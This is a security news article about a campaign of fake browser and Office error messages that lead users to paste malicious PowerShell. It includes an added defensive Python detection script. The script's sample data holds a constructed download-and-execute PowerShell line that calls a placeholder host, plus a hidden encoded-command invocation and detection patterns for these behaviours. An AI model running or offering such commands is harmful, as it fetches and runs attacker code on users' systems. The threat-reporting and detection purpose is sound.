Malware
June 18, 2024

Fake Google Chrome Errors Deceive Users into Executing Malicious PowerShell Scripts

A recent malware distribution campaign has been identified, leveraging fake error messages in Google Chrome, Microsoft Word, and OneDrive to deceive users into executing malicious PowerShell "fixes" that install malware. This campaign has been observed being utilised by multiple threat actors, including ClearFake, the newly identified ClickFix attack cluster, and the notorious TA571 group, known for mass spam distribution leading to malware and ransomware infections.

Historically, ClearFake attacks have used website overlays to prompt users to install fake browser updates that, in reality, deploy malware. In this new wave of attacks, threat actors are employing JavaScript in HTML attachments and compromised websites to deliver their malicious payloads. These sophisticated overlays now mimic legitimate error messages from Google Chrome, Microsoft Word, and OneDrive.

The deceptive error messages instruct users to click a button that copies a PowerShell "fix" to their clipboard. Users are then prompted to paste and execute this script in a Run dialog or PowerShell prompt. While this attack chain necessitates significant user interaction, the social engineering tactics employed are highly effective. The presented errors and solutions appear genuine, potentially compelling users to act without fully considering the associated risks.

A recent report highlights the severity of these attacks, noting that the payloads identified include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer. The report emphasises the cleverness of the social engineering techniques, which can easily mislead users into inadvertently compromising their systems.

As this threat evolves, it is crucial for users to remain vigilant and sceptical of unexpected error messages and prompts, especially those involving PowerShell scripts. Cyber security awareness and education are vital in combating such sophisticated attacks and protecting sensitive data from malicious actors.

Malicious PowerShell 'Fix' Installs Malware

Analysts have identified three distinct attack chains, primarily differentiated by their initial stages; only the first of these is not conclusively attributed to the TA571 threat group.

In the first scenario, associated with the ClearFake threat actors, users encounter compromised websites that load a malicious script via Binance's Smart Chain contracts on the blockchain. This script conducts preliminary checks and displays a fraudulent Google Chrome warning, claiming an issue with webpage display. The user is then prompted to install a "root certificate" by copying a PowerShell script to the Windows Clipboard and executing it in a Windows PowerShell (Admin) console. Upon execution, the script performs several actions to validate the target device before downloading additional payloads, including:

• Flushing the DNS cache.

• Clearing the clipboard content.

• Displaying a decoy message.

• Downloading a remote PowerShell script that conducts anti-VM checks and then downloads an info-stealer.

The second attack chain, linked to the 'ClickFix' campaign, involves injecting code into compromised websites to create an iframe overlay with another fake Google Chrome error. Users are instructed to open "Windows PowerShell (Admin)" and paste the provided code, resulting in the same infections as mentioned previously.

The third attack chain employs an email-based vector with HTML attachments designed to resemble Microsoft Word documents. These attachments prompt users to install the "Word Online" extension to view the document correctly. The error message offers "How to fix" and "Auto-fix" options. The "How to fix" option copies a base64-encoded PowerShell command to the clipboard, instructing the user to paste it into PowerShell. The "Auto-fix" option uses the search-ms protocol to display a WebDAV-hosted "fix.msi" or "fix.vbs" file from a remote attacker-controlled file share. These PowerShell commands ultimately download and execute either an MSI file or a VBS script, leading to infections by Matanbuchus or DarkGate, respectively.
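The behaviours described across the three chains (DNS cache flush, clipboard clearing, base64-encoded commands, remote download-and-execute, and the search-ms handler) are individually unremarkable but unusual in combination. The following Python triage routine, an added example that is not from the original article or from any vendor tooling, scores constructed PowerShell script-block log entries (as a SIEM might receive from PowerShell event ID 4104) against those indicators; the sample entries, the placeholder URL and the scoring threshold are all assumptions for illustration.

```python
import re
from typing import Dict, List

# Constructed sample script-block texts modelled on the behaviours the
# article describes. These are NOT real captured payloads.
SAMPLE_SCRIPT_BLOCKS: List[str] = [
    # Benign administrative activity, used as a control.
    "Get-Service | Where-Object Status -eq 'Running'",
    # Resembles the ClearFake 'root certificate' fix: flush DNS, clear the
    # clipboard, print a decoy, then fetch and run a remote script.
    "ipconfig /flushdns; Set-Clipboard -Value ''; Write-Host 'Fixing...'; "
    "iex (New-Object Net.WebClient).DownloadString('http://EXAMPLE-PLACEHOLDER/a.ps1')",
    # Resembles the 'How to fix' base64 command from the HTML attachment
    # chain. The encoded string is constructed filler, not a real payload.
    "powershell -w hidden -enc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
]

# One indicator per behaviour named in the article. None is malicious on
# its own (admins flush DNS too), so the combination is what gets scored.
INDICATORS: Dict[str, re.Pattern] = {
    "dns_flush": re.compile(r"flushdns|Clear-DnsClientCache", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard\s+-Value\s+(''|\"\")", re.I),
    # -e / -ec / -enc / -EncodedCommand followed by a base64 run.
    "encoded_command": re.compile(
        r"-e(?:c|nc|ncodedcommand)?\b\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(
        r"(iex|Invoke-Expression).*(DownloadString|Invoke-WebRequest|irm)",
        re.I | re.S),
    "search_ms": re.compile(r"search-ms:", re.I),
}


def score_block(text: str) -> Dict[str, object]:
    """Return the indicators hit by one script block and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Threshold is an assumption for this example: an encoded command
    # handed to a user to paste, or any two behaviours together, is
    # enough to raise for analyst review. Tune against your own baseline.
    suspicious = len(hits) >= 2 or "encoded_command" in hits
    return {"hits": hits, "suspicious": suspicious}


def triage(blocks: List[str]) -> List[Dict[str, object]]:
    """Score every script block, keeping its index for correlation."""
    return [dict(index=i, **score_block(b)) for i, b in enumerate(blocks)]


if __name__ == "__main__":
    for result in triage(SAMPLE_SCRIPT_BLOCKS):
        print(result)
```

Correlating a flagged block with a preceding browser or Outlook parent process, or with a Run-dialog launch, narrows the alert further to the paste-and-run pattern the article describes.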

To Sum Up

Across all these attack vectors, threat actors exploit users' lack of awareness of the dangers of executing PowerShell commands. They also leverage the inability of Windows systems to detect and block the malicious actions initiated by these scripts. The varied methodologies employed by TA571 indicate an active effort to improve the efficacy of their attacks and discover new infection pathways to compromise a larger number of systems. By understanding these evolving threats and implementing robust security practices, organisations can better protect their systems from these sophisticated attack chains.
